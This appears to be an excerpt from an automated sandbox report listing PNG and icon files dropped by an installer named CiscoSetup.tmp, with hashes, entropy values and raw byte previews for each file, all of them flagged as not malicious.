                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2531
                                                                                                                                                                                                  Entropy (8bit):7.8827223365027725
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:PajMqdGnKe/dujhrZicEFhViZIs2sJ69y+10zTECChhrHxgpj:PaIqcnKeKZHg7by+ezTLUhrR+j
                                                                                                                                                                                                  MD5:2EA165B23D882176DAAD7C368EE24642
                                                                                                                                                                                                  SHA1:A46B746D76A41D4B322552BE4D66E9FAC66D7C19
                                                                                                                                                                                                  SHA-256:5B0F218A1EDB9CE79C15E8278557CCDB8AF44EAD52B4149CBC27DEF6FFE38619
                                                                                                                                                                                                  SHA-512:7C6C1F9FBDB726AF81551CB2CB790B847904E10AB90923A8FA43C34D617FD4A7F4B0A6FC85D327FA140D8C42197213F2A2BBB4643C16A1FC7DF17C1AF1E674FC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..\ol.E....)....{.*i#.A .lbi..~.E.......M!..E.M..m.......L../=...TJ...4..@9.....O.E...fz.{..3.G5.%....y.y.....=.a..e.D4.....|.C7....3x..w.....NP(ZVHD5DTMD....sg....E.......+..........ImD.:...3...BP(Z....).(.4A..`.....l..AT.....K@..$Y.~..+A..5...H.\4..V/.Z.'.]{..P.."._...'Q..d%.....j.\...."..E..nS..+Q....e0.."*.1o...-....d{."..i.`.....$.......q...i...Q.6.R...V.j..A.h...>h..'.....)?/.@$.q..u.y'.....6-..wv{.Q../..e/..7.y..wl~.^....;6tWHp..TY..JK..........G/...{"..A.....E9...i..~.....Z@.....zs..t.&;.=..M..C....3)7..z.m.|.'.N.{iiP&.9...m=....L.....ar5.O...&e.} S..~j......>....8..=0v. ..f).#....UC...9..Q....}h8I.R.HI..s....F.6.....v..O^.EhSP.,R&!....N.. ....{...s..$L.....I2... ........C.......Dt........2BV).0.#H.[....@..M.jO:....(S/.v.f.A..bo.t....|M..Z.2BVijk..'.$...n...BP.r..<@KB*.R.....A..6..2.d...:..Y5..F..0...b.;.D....p...=..;v.hgK..o.Iu.... ..R.U.....c...9....xi.TW..`.....~...N.".A...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31702
                                                                                                                                                                                                  Entropy (8bit):7.968827949628217
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:j9rxAm3IyJR5xmDQXMUg0HvpXOQFvgMN/2iHxr:j5X5AVUjEQ9NVRr
                                                                                                                                                                                                  MD5:D7A6605937F7BE6861ED243FEED7B2AF
                                                                                                                                                                                                  SHA1:CE9EFBCE4C470923C242615A0B53E775800BB031
                                                                                                                                                                                                  SHA-256:331F0FB3EAA0F38927DD0B350A6D92B8E18ACFDF64CBC597B470EF6E4D055C81
                                                                                                                                                                                                  SHA-512:A9C1C5503D9987245389C762ECDA0F4803BD84CC3D47534731F9194BB33DF93C7FEA6569D6E0BE03C4A59551B4F8021AA129A38FFF653FEB81B5DBF065438FCF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx...l]...2j...J.H......vf2e..8....Tu.4j...p50E...P.8.+.k.. Z..%.F...#..5..SR'.B{....d:p.;.7P.Nf*........d.}..g.[k....#.....g.....%H...!..~.T.^...'&&..2>>./...A......e.EX....v....e...nb.....E..(}yO......O.ttt.:...8...%k...rW.....h$..^.L..<..5.V..{..7...,.#..r..x...$...$..H|!...A.^.4.$..Ht!t_. I.J....bXy!$E].$...(."..X.B<..c....i7...p!.....X.s.\..^...............~....>.6^..8;...D..>./.hs.Q..u1f..hii)...I......q.....8s..F...0..i+\x<...A..22lZ..&x....y%\.....7..b.iTH...z..1....G.$........1a.d..b..Kvh...V...*<"*1.lG..p..?.B....)q...q.'o..6mJ..G.y.....=.....1...R.8.....3..7.tc..l...../....L...Fs?&Q....G?J}PI~.v!.......Cm..P.;....T..=....%.....*...^.s...~x.~....}.5.\...o..}]..s.....2......?...-?....tDW(.b.K.X.o.........;.w...w.........\..0.o..N.......^...7..........d..].........{....+..o...... '...).....]..n.G...+....Q...IvB.......x..y...^..3.sm..I...Hb.]g..-.g ..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2106
                                                                                                                                                                                                  Entropy (8bit):7.848629133083243
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:gySVFiuSZgKTkBsSS/Z89Vn1MM1DCINukyd5Wb:gySBSZCqBhen1MM1CINgsb
                                                                                                                                                                                                  MD5:85D427479A5F8E6F69DEB0A5EC7E6DBF
                                                                                                                                                                                                  SHA1:95414451D6AE9B130831A1C297151F65AD849A6C
                                                                                                                                                                                                  SHA-256:CF8B60054D290DFA6BA59086BF18F5ED0718C721B4ADD200AC95275E5457AB58
                                                                                                                                                                                                  SHA-512:58248F232F27441ACB81B0A6AF2272D19EE1710101C3675CCAEA4BA3CE8A74D664053C58EF2D9C948F2ABCCA4F30B5ACF633A2EA53C8E260BB40FA6F1214151C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..]+s#G..K..N0P..Nf)..0... ..v......l...P*.{(.2R.Yf...*,a.U.d....3.....g.,..~N..$$$$$$$$$$$$$$$$$H..^.b6h.@W}.?.V?oc..O.....x^_...lR.A.......=[,.zX}..S.^..y...8!.@..4...i.5..l...sEHl..p........D.HA2..K.)....:...l.Ud.k.........:........p..Re.J...U.Y..9(.>...%....a..e..V........D.:J.eL..GJ6.P.....3B.kG...wgCP).?.5qH....85|.tel.q..W..=..[.u.....w.3r..k.....RR.B....$....]*.}../.@.71.s0b.bNH4=m.l.^I..`.".. 2...X...^......U..s.!d........~..;..J.f..,)..T..V3+.g%.T.G.b..K.r..=.GF...GT5.s..N.l..:.$..,!.T.......r$>.H..1...Q..}.~&..z.:.iF.}@b..mP.....!B...e..R...A(....U.#..o5&a.43..."]".._..m.......7.G..w.5q&..V.............,.+)\.;.0zw.Th....;.!..^J..-...:L.L.iM..g..Zgq.N8.qhYd.?.7...=t.iL[..B........yi..L...q8w..>..x..p.O..VY.u.s....%A.....`...*.n..L.f...6_."..R.D...8..^...>.N.J.1.;.T....-...}~.M..J.:...B..{m.L.m...>.J;.\T.=).xQ..u{...f........!.)y]lck..W^.v.T.ms...%^..,.b..]ZZ...u.^...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12436
                                                                                                                                                                                                  Entropy (8bit):7.977312501768235
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9duiLviw1Tg2WOFeuMhEhKPewOSJKVBpFGo5cJUs1P3X3cI78saDjy6Z7KiasZM1:7vJ0OYhbPWEKLaoe9dXsI789HZTla
                                                                                                                                                                                                  MD5:3F1083A6458C2CC3E9743D03ACB0D349
                                                                                                                                                                                                  SHA1:280DA65E961DAC251D6394A234E92FB110DBC998
                                                                                                                                                                                                  SHA-256:78A87D7B4CDA2E04CF4A608C78CE627450E15CD75AE121B4D72466837197D096
                                                                                                                                                                                                  SHA-512:250604CE42BD866B870A50B01E892036364DBBBEA1AC58EF60B3E4E38513A9DADE3987459FBD83681435D74521B368550DFE329E70CDD84837BAFCD2E43B53A2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.xV...c....../\..T..@.....T.`.d....H.H..^F.@...!.X.x.PqP..{4...4.F.I.......2....".?...f......._...?.u.....}$,$..._TZH.9H..q....5...[.[T.#=.=..._...s..R.0Or..5eCl...g..e7.+z?eE........6.~.";.y....W.(?...Wf:P..gI.<b.Lr..Qd..........\.A......t.`,._...u...`/.........!.{...T./...........+....>C......8.....[.. ...WNQ~.;v..3...b5.l...*\~....+R....+.. ........`..........{;v.|Ry..x..UQ.&..%..$....>s......../..2..\T..Y..G#......x....W\.DT[.....v},]I.Vr.m.....x.......1.cu.D...bO:...6...,[\)=....,o..o.a.(.".....&.D.......=x..*.P&.........".}z+/_..X`etu..J......1....A..;...B...{.....M./Vb....v.T.a..3.....k.....T..JC.u....`.[..(R..........{..4R...B.8...vE...}w5...[.....F...3pTU{k.Bz.L....-T...T..?......|Py0..&.J.|...........{"..3pT.V.r...PH..R..M5V..AB.8...R..A.\......(3.p;..\.h.m....p..Q..'ok...O.6.$.....g...J...0...?O.~[[.),,4..N.......M.....cb.jT.JU.e..........1..({DW....K.*,=..!..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13810
                                                                                                                                                                                                  Entropy (8bit):7.9753795366170355
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:9UvTt4Skm1eC/3ndqwLk01JZ1GUhDYLk6pb2IloPTCDnnd:9qeSXeC/7TYpb2jSnd
                                                                                                                                                                                                  MD5:276699732D96B797E30C6092A6B9A3C8
                                                                                                                                                                                                  SHA1:9430D64617EC4CAA2895D0755824E556568FDC70
                                                                                                                                                                                                  SHA-256:217DD0FA6E750A6E5E422744ED0650204519942130254825CBE87B16E5E5AAAD
                                                                                                                                                                                                  SHA-512:884D6A9A105697FD5F4F4032FA14C967826937D42E6B88FD6D8DECC3B03AE0296588CF1D093673765C16CD65872405F52986303DF2453D50DDCA6F540082DA0E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x....B.R .w4..-.p-b..o".....`U.R+.+..=..<....J.b...."..U...ATD.....R....G. ..Nf.k.^k..k.%........3..o}..T...y........Pkt......r..wj_.~z...^....l|2....L._...>.I.../..^...N.6.$...:Q.N.iK.........V...X%N&.[Q.-c'....W.p,~U..-...S.....N.z~.w. .....;..<..>.?..._oK....w......3..[U[.....o.?..U.>.[...lR...D...u.w.../n.Y...{.x8O...M,......;.d<..1.._7).D&`.....N..3jx.g.S.[....N.n#..^?H...x.'.^}.i......_H.....I~1..;.S....;;.......x.w...............~@oly.;....F..]...i.?.P.6m..Q...#%.%...$<.p..W]...'.A....._uL;.o......_~.>........L..O.}..b....I.Gae.n....U..Y.6m.....+.-4.;.].............p...A..g.../...N..+(.$...n..S..&.....\z...]..y..v...?[...=.NZ.\.*...#.J***f.q`#..*H..W.45.V.{...G..<IT..'K.f*;Q.Vz.....u7.W";AT....1.-_.$.'d...-.<.c^o%::..L.%N<.+sLVc,.q.^'..i5&*/.6.....i*...Y.N......4$.!(...p1..6U..._.8....#{g.A..@.R.#..)........i............ ..F..S.......Qf.~..u..9......M..cN:.7F'..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 5334 x 1067, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):83111
                                                                                                                                                                                                  Entropy (8bit):7.138058183615623
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:VC5Kuc25xWuSyREGUa7eZoQZBrMd+Wdl6P1NsDO1U:VC5Dx8yRTeBZW4k9DOu
                                                                                                                                                                                                  MD5:E9352AD002DC71C84B605700A6684C46
                                                                                                                                                                                                  SHA1:312487A0D0778CB57EBC0B5ABBA29CB6C31187FA
                                                                                                                                                                                                  SHA-256:55E9F9561425D5B5994506DB5932FF3C87ACAD729BB4CC043EE99EFB85484E0A
                                                                                                                                                                                                  SHA-512:CAC779DCB625BF8C8736686407BB81DB140434FB16DC98144E113F2822AB3A907A7E7CA63751D73604B11EF0F0DFCB6979833DE75B160542CF7C969F39533867
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.......+........%....pHYs...#...#.x.?v.. .IDATx...kn...`..^..#?N...$..d)..c.5d/..ASy.q$Y....y...3.D........................................................................................E.....GW.....P..Z.nC........0\./_Ow?v:...`..x.j=..9.......@....5q....P5.&...hl.....&...hl.....&...hl.....&...hl...M..\v.......P.{.g.h}.;2.@...e#........Xr8.n.....s.er..<.4...fNi......H3.r:.....?u$`'.~.~...dsHN.<.s}.0.qy...x.A<..}7L.y....}^~...].w([U.M`.5..1... .pB.F.>IMc..|..y.].......7...^46.a.....p.c..-...{.`.....,..#x...>I.:......a.........|M.-..k..7:...;...C.........?>~>..)........o9(O.i.'.{.n..~.q....2Q.....W&.....R....Il.....;..~kH|_.R......O....2..}jp....f.1!%..OY....n...F.lfL....W....'.CH,.....g/..y>>~.+*j...$e........Mb..;.........Z...A.:.~...Y|.o1P.A.$...)....~....S;.RR..@...W.&.}.q=.N...:[.C1.5.=...r.U&+._.z.O~o........m......}..t.vcR....u..{...&P..7.......c<....15.?u..5..U.c..........:.*.N.MhPw.=..K..y..>vc.....{;....F>..k......,.-..N...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 375 x 23, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):700
                                                                                                                                                                                                  Entropy (8bit):6.305816801627044
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7B0J+UJbp92cDPuY1qHlnv/pebLaeb9Lf43DQ6TjpuIXG13DQ6i5t2c:0erLYWuqylnv/pe3aO9KDUIXO3D+/
                                                                                                                                                                                                  MD5:894AB8F4298F2238292E31BAB5CCAB10
                                                                                                                                                                                                  SHA1:FCFC29B4E5BAC3C59EDA1F8837087E768F7B0A7B
                                                                                                                                                                                                  SHA-256:7C8B5EC8C7DE5405AAEE5B1E92C605020424AED8AF830C2429ED47883561A39D
                                                                                                                                                                                                  SHA-512:B7F06E961C2C2BAC0EFC5633E213D90E3206093593988BD04CE84DA13B1D1B4F0B83DEB77FF247E6681A645004FD37C2866FF83EB7A6A5E3E581B0868AB58C3E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...w..........C......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>.L.'Y....IDATx...... ..A.............. @.@J...C...._..+.......=.T... `.u....A...|.H...0.:@.....q.>U$....w. @.@P....*........ @ (`.O......]... ..0....D.............SE"@..q........{.". @..........=.T... `.u....A...|.H...0.:@............X~....IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2465
                                                                                                                                                                                                  Entropy (8bit):7.9078675566370515
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:OSjMqJt67atsaB2Q95MFMQQYs/7uI2/D8:OSd+7OsTQTuQYszIb8
                                                                                                                                                                                                  MD5:161092451DAE50221183377F7CFB560E
                                                                                                                                                                                                  SHA1:2884EE1CAD503614512FAF274C3E0AC209F9201B
                                                                                                                                                                                                  SHA-256:8CB267EF7B475567CF0A347A4E99CC533102789A966B7285A7733FD8E4FBDE47
                                                                                                                                                                                                  SHA-512:0BD327894C7A1AFC5AF1B3CD1D678370C568DF1A06A32408B4A4A3047A846657EDC09A1A0E094565EF4004DF6FEE3FBF0A2885FE0279F4920CB91FBE1D897B14
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~....SIDATx..\.l.U...d..v..P(t[..DDJ....-..."...5....1T.Q"i..?.....jK..ZS....) .*..6........s...e.3o...........s..{.*r... ..2.(.o}|..."...6l..]n....y..t".ID.D...l..ql;vt.y...u\g..:..+{......I5DT..5.t...!....8)K.:RS..!..-...S.0....e[..*8Y...E)A......H...y.yL%*.uU..S].>AV.'.\%QJ..&..)z...s.U|.!...i..5....e. .?.S*#.t....#..m...ol.D.7..CM..B.WM%|.L...E.)..P..6...A.V.d. .?....T3oF.=...JJL.qI....C.{..v..W.}.PS..........#........n%=.`.]}.._H...S..l.eL.5.9..;...x.....!).....T...q.....<.VU...n..J....i....g.{.m2$.61.9.....I..&7k.*.|.'m5s.).]...7....`n$.$C.....X!)....a......9..q...0......$..9.....A......!m...:.{.....T..LZ.....&|.H...A.0..8.O....?".,..N.V..._6R...X`.w...gx.5U....I..OIV.J...z.i.H..k...\..U.. >}..A`yi...Ct.y..8..#@Q8.'&.KK.D0y...2..i..$....Q...."j.....[Fg..0....,(9o.".8]S.#.9"ZSY.....Dtu_..ZO...G.9f.".(.$M.t+...e9&...L..NDk....$......|.l~..O`.....G...'.,`.D3...*.\.g.VEqQ."..C..,.*9..M.y..~."..A.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12558
                                                                                                                                                                                                  Entropy (8bit):7.968059020803266
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:uop8Zgd6lZbxmfVR68Sj8p3f/NMolH6FeIB9OxW:uo6Z4Ic6potlg
                                                                                                                                                                                                  MD5:D30964E871F60B296F5109215FC341DC
                                                                                                                                                                                                  SHA1:365DDAFC27D304BBB3B8A99D0A62504E5D2D0B03
                                                                                                                                                                                                  SHA-256:16FDE630F3C55080422FE6965CE08D3CA85168655C73E05E3F9B7C00DC14507A
                                                                                                                                                                                                  SHA-512:22E918B1187909FCF80ED6ED091ADFA6081E95A2482F6676DA84D8CD580CD4557D9FBDCDD948ACEA03A8001BABA4653F4C735672F668DB9D226F9362A079358E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....U...hr!#.D'..i.L.$.l..V...q+.....H..l,.h...T.v.Ui..@..,.....Y.*.1.i........BX%:..4.n.O../..y....s.s....{.}.....>.}.a|R(.!.!e....|.:..Y.Jm..g...E.....S#>...R....0..[Dt.....R...i1,Z9BDJ5B...b49e....b..Z.`..(B.lq..Bq...!b.#Zc!..,Z..P..,....R:S.#.MDe{.Jm..|.L9,Z).B...E....Y......xX..E+%..|..M."eD$u...z.y...}..H.' ..Z.....X...P...Buk..P."d.9x ......uq..;t..q....Q.y...=..'rv......h.F.B5...h.%....K...>...@........7i.....8t8..e.3..-.(K....*DF..+F..>.4nTZ.&G \.......[.G.......|3`.J.a.#....* J..&..e|....x...g}..L...VA...O.....Q.\.U..{.He-...Dkk.NK..w..N~.z.'./N.c.E+&D..B.....~...4nt.#)U.}ml.fEc.|....Z.....,Z.S(...)`.Z*.U}...5}....cGa[_....z...8u......bu_....*~.6ni.Ak..D`..ul.G...F._.("..b.ToZ.D.7g:.U.....L..x=....-.....0...fN.J...j...=.. ^..B..,^.a.RD..+....*...*..........}.xi.E+$a=+...n.*...G...uG..rB.z.a........A+...`6.Re.D\..B..'D....0(,Z>.=.+E..o.....l..Z......T..*6..B..hyPf.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5494
                                                                                                                                                                                                  Entropy (8bit):1.0422788649872297
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:xh4r3rEO9SEEEEEEEEE2888888888Bsff:xKfgH
                                                                                                                                                                                                  MD5:B4FE215E5858B187A041DEABB2E1CB04
                                                                                                                                                                                                  SHA1:E8F16887E8BFFF243EB1AEAAF21B382CD0DFD9EE
                                                                                                                                                                                                  SHA-256:9FC38B41A0D11FF64348F0E125692091D478E6E4F1C368A4E01863D49F87BB87
                                                                                                                                                                                                  SHA-512:371FEA20A067929B21543490CE56C370BE8477B40630D2EE0BA613FE91A485D083DCB0FE4B0E76465576935F0311CC65832B48B3487F5C2B83ABB4E8B9AB4270
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... ..........&... ..............(... ...@...................................BBB.XXX.cbc.nmn.yxx...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4267
                                                                                                                                                                                                  Entropy (8bit):7.94257084168463
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:IqGbLvTlphRGJSqAeFg590km/kqzrxsoCeaV6XjNfUmhPRD3el9:ILhKFZa0PCPiNfU2RCL
                                                                                                                                                                                                  MD5:7014A8C17D7E8E5A2BEDB4C4E0C12E80
                                                                                                                                                                                                  SHA1:28881EE38814E155FA7B1E0096801A644CAB6548
                                                                                                                                                                                                  SHA-256:BD9514FA182DE90450B6E6E3EEDB2E084CD1390D5B6FDF0509B81EC36B963147
                                                                                                                                                                                                  SHA-512:B2B94E806A4F1F8BACAA2870944C75952A9C9F0577AF6571BFF65038DCD242AF5B887E400430E8E8B0B8E8BD2BA7A7318247581304C668662A7A6A255F142A12
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<...MIDATx..Zyl..u.s......x..$J.i).l.......6..8.k.h`....(Z.UZ.Q.-....4n...l...6r.@r.#J.K.M..O.7w.......{..R.E.....@.vvw...{..~..~....u7.).......Np..r..K.(f..%!.LB1k....p.......E..l.........x.."{$.Wl..hY.lAO.R..B*>d....c...D?.........*.......=...[....N....;.|..d.T.&..q..."....I...pi8...?...6...s.R.....z.......U5.pM{.j..C..k..wW.....W.e..X.....9"...Q.@.y.G.,.x<....Y...]....\.wn.........YsI..+.....m.?.o..^...`@:]...w#.sv....x....@..0As....!...j.^.q.~..G..z~x....q.....J..a......6=td.=.M..Z.k*..,.#......i.......xP......S.A. o.y.`A*.C.i%..5~......_.Y.?/.%.=z..dr...N..X.lz.....|......x.s6.d.". ........l....@Te.C.)..E..@..%.$..e.&..r..g...9.]k}.t..R...%..6..{............G^.o....F.!.F..Ar*`.<....L...&......S..y|..,$.Yp......A.X.t..N..q.....d.p0.A[S....m...2.g..nr...U...../.vu.........Z".Cl6.....Dt...s2.....l.`.(Z.x.2h...3.f....M.<.F.H)......q.H..p...n.M.......T..._..v?..5(x....
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1807
                                                                                                                                                                                                  Entropy (8bit):7.846793911413473
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:M3uM24lXN+maawwFvEk9PMjKHcdAJ5xo+n7R/0+5GpxwGjQaTNn7ohEoGCL5F2lr:M+VU3vVsk9kcqE7RN+x/BohRnG
                                                                                                                                                                                                  MD5:536C911881523B9F8402A481881992A0
                                                                                                                                                                                                  SHA1:2748A03D65DA7D6B4A95ACBDEB6ECD6F409A0ABF
                                                                                                                                                                                                  SHA-256:246B7E52A41AA64365D84C7DA73FD20C27B8C825C61394AE8C775DBD9BF5B668
                                                                                                                                                                                                  SHA-512:608DFEC9C7980707B9947F3CFB8BEF93FDF1D6D5B908E25888BCA0C7CE83C70F23AF87798F38E364E75FA05C89523028B5742E3084E6401068A7DE6BC5BF90E4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..;R#I..k.........1...h.@'..:.V...1'.q..kM...Ly..h..6J.=....Y.%E~...!..wVe... .. .. .. ....O;....I..UO...........R.........7...E)5W.d...Q.)J5.7\{....Q.W.P.R.a.@.*K......ab...Q.d..zV....^..m.C.t..U.Y.e..(.....x.J)...s.....)..XM....Y.._~Q......o#..........=.p+b.E..X..X.}.'..o...DJw..GJq.].^.%R.#..3.y<.s...5.......s.s....;>.Z.q.F./..r.Z...T..=.&H......z...~J/.%.....(.~.|R7...z.LV....+.........T....|L.1i<..Zc.]LO.;.@.:.?IU./..A.,.-.rGr!Z...'I.........6+^......a....n6~e6ejy.f.........\UC..\..i..s.r.U_.i..>......u...p...zb5..t|u.h.*gxD..}6T[i.jxO./..goc...9......(.[..........*.{.8.f.(..R..J8.za.;.t..aj./.5.^px....g[...]z...=.Q.Q.%.D...z2`.;.6.K9.26Tc'....)_...$..<.&.7v.....pQ..N....s.c...XX..x.>..O.....)&/IYm..=....7.A.......c$..R....T{.q......C..@.L.....]({..>y.:.e.#....ym.....g^.R.....v.$.M.B.E....^.xSF80......n|Ph./..%<.I...X.f..=.pz..~...a..O1.9g.m.Mp....n.v%D....w....F6.....{.".!.~.}..}.P.S.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4455
                                                                                                                                                                                                  Entropy (8bit):7.908038022091361
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTIaLT1ZWqwPFR34mH:TSDS0tKg9E05TBZWqqPH
                                                                                                                                                                                                  MD5:2E3C536FBC9DDA9D0DA7DD408FA3D69B
                                                                                                                                                                                                  SHA1:4056553645ACFD51D5BB1E74623ED9938C0F5717
                                                                                                                                                                                                  SHA-256:D86F0CEDDF46C275DF0FC6CF0FE70852DD270D0BC35355CC6B30CE7DDD6EC2B7
                                                                                                                                                                                                  SHA-512:AB3237097BBA665CC1B22F4A4C280C6141E8266EA9D4A569C3B53D4401E00F4E1E0F7944A172C16CDD455AF8EAF3EAA9FC43A08EFDFE7844689BFC7B4CB870F1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
